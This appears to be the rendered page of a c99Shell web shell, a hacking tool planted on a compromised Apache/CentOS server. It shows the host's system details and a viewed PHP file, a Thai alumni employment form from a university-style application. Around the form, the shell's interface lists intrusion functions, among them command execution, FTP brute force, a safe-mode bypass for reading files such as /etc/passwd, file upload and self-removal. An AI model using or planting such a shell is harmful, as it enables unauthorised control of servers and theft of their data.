!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/ealumni/   drwxr-xr-x
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_alumniWork.php (6.19 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php 
$row_hw 
= (isset($qu_hw) && $qu_hw!=NULL) ? $qu_hw->row() : NULL;
?>
<table width="100%">
    <tr>
        <td>
            <label><div align="center">
            <table width="100%">
                <tr>
                    <td align="center" class="h">การทำงาน</td>
                </tr>
                <tr>
                    <td><?php echo form_open($this->config->item("ea_folder")."alumni/v_alumniWork",array("name"=>"tab3","id"=>"tab3"));?>
                    <table class="easzone">
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone"><font size="2"><b>ชื่อหน่วยงาน (ภาษาไทย)</b></font></td>                
                            <td><input type="text" name="companyNameT" id="companyNameT" size="70" value="<?php //echo setValue('companyNameT',$row_hw);?>" />
                            <font color="<?php echo $this->config->item('font_color_err');?>" size="2">*</font>
                            <?php echo form_error('companyNameT');?>
                            </td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone"><font size="2"><b>ชื่อหน่วยงาน (ภาษาอังกฤษ)</b></font></td>                    
                            <td><input type="text" name="companyNameE" id="companyNameE" size="70" value="" />
                            <font color="<?php echo $this->config->item('font_color_err');?>" size="2">*</font>
                            <?php echo form_error('companyNameE');?>
                            </td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone"><font size="2"><b>ที่อยู่ของหน่วยงาน</b></font></td>                    
                            <td><input type="text" name="companyAddr" id="companyAddr" size="70" value="" />
                            <font color="<?php echo $this->config->item('font_color_err');?>" size="2">*</font>
                            <?php echo form_error('companyAddr');?>
                            </td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone"><font size="2"><b>ตำแหน่ง</b></font></td>                    
                            <td><input type="text" name="companyPosition" id="companyPosition" size="70" />
                            <font color="<?php echo $this->config->item('font_color_err');?>" size="2">*</font>
                            <?php echo form_error('companyPosition');?>
                            </td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td class="coltd_easzone"><font size="2"><b>วันเดือนปีที่เข้ารับตำแหน่ง</b></font></td>                    
                            <td><script>DateInput('companyAdmidPosYear', true, 'DD/MM/YYYY','<?php echo getNowDateFw2();?>');</script>
                            
                            <!-- <script>DateInput('companyAdmidPosYear',true,'DD/MM/YYYY','<?php echo isset($row_hw) ? splitDateDb2(setValue("companyAdmidPosYear",$row_hw),"/") : splitDateDb2(getNowDate(),"/");?>')</script> --></td>
                            </td>
                        </tr>
                        <tr bgcolor="<?php echo $this->config->item('tr_color_even');?>">
                            <td height="22" colspan="2" align="center">
                            <input type="submit" name="add" value="บันทึกข้อมูล" />
                            <input type="reset" name="clear" value="ลบข้อมูล" />
                            <input type="button" name="cancel" value="ยกเลิก" />
                            <input type="hidden" name="method" value="edit" />
                            <input type="text" name="alumniId" id="alumniId" value="<?php echo set_value('alumniId',$alumniId);?>">
                            <input type="text" name="seqId" id="seqId" value="<?php echo setValue('seqId',$row_hw);?>" />
                            <input type="text" name="tab" id="tab" value="<?php echo $tab;?>"/>
                            </td>
                        </tr>
                    </table><?php echo form_close();?><br /></td>
                </tr>
                <tr>
                    <td>
                        <table class="eaheadCol">
                            <tr>
                                <th><font size="2" color="<?php echo $this->config->item('font_color_table');?>"><b>ปีที่เข้ารับตำแหน่ง</b></font></th>
                                <th><font color="<?php echo $this->config->item('font_color_table');?>" size="2"><b>ชื่อตำแหน่ง</b></font></th>
                                <th><font color="<?php echo $this->config->item('font_color_table');?>" size="2"><b>ชื่อหน่วยงาน</b></font></th>
                                <th class="editCol"><font color="<?php echo $this->config->item('font_color_table');?>" size="2"><b>แก้ไข</b></font></th>
                                <th class="deleteCol"><font color="<?php echo $this->config->item('font_color_table');?>" size="2"><b>ลบ</b></font></th>
                            </tr>
<?php
                        $i 
0;
                        if(isset(
$rs_hw) && $rs_hw->num_rows()) {
                            foreach(
$rs_hw->result() as $row_hw) {
                                echo 
"<tr onmouseover=\"bgColor='".$this->config->item("tr_color_even")."'\" onmouseout=\"bgColor='".$this->config->item("rg_mouseout")."'\">";
?>
                                <td align="center"><font size="2"><?php echo fullDate(splitDateDb2(setValue('companyAdmidPosYear',$row_hw),"/"));?></font></td>
                                <td class="indent" align="left"><font size="2"><?php echo $row_hw->companyPosition;?></font></td>
                                <td class="indent" align="left"><font size="2"><?php echo $row_hw->companyNameT;?></font></td>
                                <td align="center">
                                <img class="hand" src="<?php echo base_url()."images/".$this->config->item("rg_folder")."picture/edit.gif";?>" align="absmiddle" border="0" onClick="sendPost('hidform',{'seqId':<?php echo $row_hw->seqId;?>}, '<?php echo site_url($this->config->item('ea_folder').'alumni/v_alumniWork');?>')" /></td>
                                <td align="center">
                                <img class="hand" src="<?php echo base_url()."images/".$this->config->item("rg_folder")."picture/delete.gif";?>" align="absmiddle" border="0" onClick="confirmDel2({seqId:<?php echo $row_hw->seqId;?>}, 'hidform','<?php echo site_url($this->config->item('ea_folder').'alumni/alumniWork_delete');?>')" /></td>
                            </tr>
<?php
                                $i
++;
                            }
                        } else {
?>
                            <tr>
                                <td colspan="5" height="22" align="center"><font size="2" color="<?php echo $this->config->item('font_color_err');?>">** ไม่ปรากฏรายการในฐานข้อมูล **</font></td>
                            </tr>
<?php
                        
}
?>
                        </table>
                    </td>
                </tr>
            </table></div></label>
        <br><font color="<?php echo $this->config->item('font_color_err');?>"><b>หมายเหตุ : </b>* หมายถึง ต้องกรอกข้อมูลให้สมบูรณ์</font></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0066 ]--